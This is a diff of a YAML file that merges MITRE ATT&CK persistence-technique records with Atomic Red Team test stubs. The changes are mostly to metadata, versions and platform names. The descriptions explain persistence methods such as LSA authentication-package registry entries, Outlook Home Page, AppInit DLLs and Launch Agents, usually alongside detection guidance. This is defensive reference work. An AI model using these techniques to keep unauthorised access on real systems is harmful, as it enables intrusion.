         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -37539,12 +37948,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -37622,41 +38030,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -37665,27 +38043,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -37746,7 +38151,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -37790,7 +38194,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -37812,7 +38216,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests:
     - name: Add file to Local Library StartupItems
@@ -38045,7 +38448,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -38068,7 +38470,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -38098,12 +38500,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -38193,12 +38593,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -38283,7 +38682,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -38348,18 +38746,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -38392,10 +38789,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -38432,7 +38828,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -38506,7 +38901,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -38534,7 +38929,6 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests:
     - name: Launch Agent
@@ -38655,7 +39049,7 @@ persistence:
           sudo rm /tmp/T1543_001_atomicredteam.txt
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -38714,33 +39108,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -38761,6 +39132,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -38775,52 +39147,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -38842,6 +39204,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -38852,23 +39215,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -38885,7 +39275,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -38944,7 +39334,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -39026,7 +39415,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests:
     - name: rc.common
@@ -39156,12 +39544,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -39184,16 +39571,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -39220,7 +39606,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -39289,7 +39674,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -39325,7 +39709,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -39344,7 +39728,6 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests:
     - name: Copy in loginwindow.plist for Re-Opened Applications
@@ -39438,7 +39821,7 @@ persistence:
         name: sh
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -39488,12 +39871,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -39526,9 +39908,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -39545,9 +39928,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -39593,12 +39975,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -39612,7 +39993,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -39671,7 +40052,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -39697,7 +40077,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -39723,13 +40103,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -39753,8 +40131,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
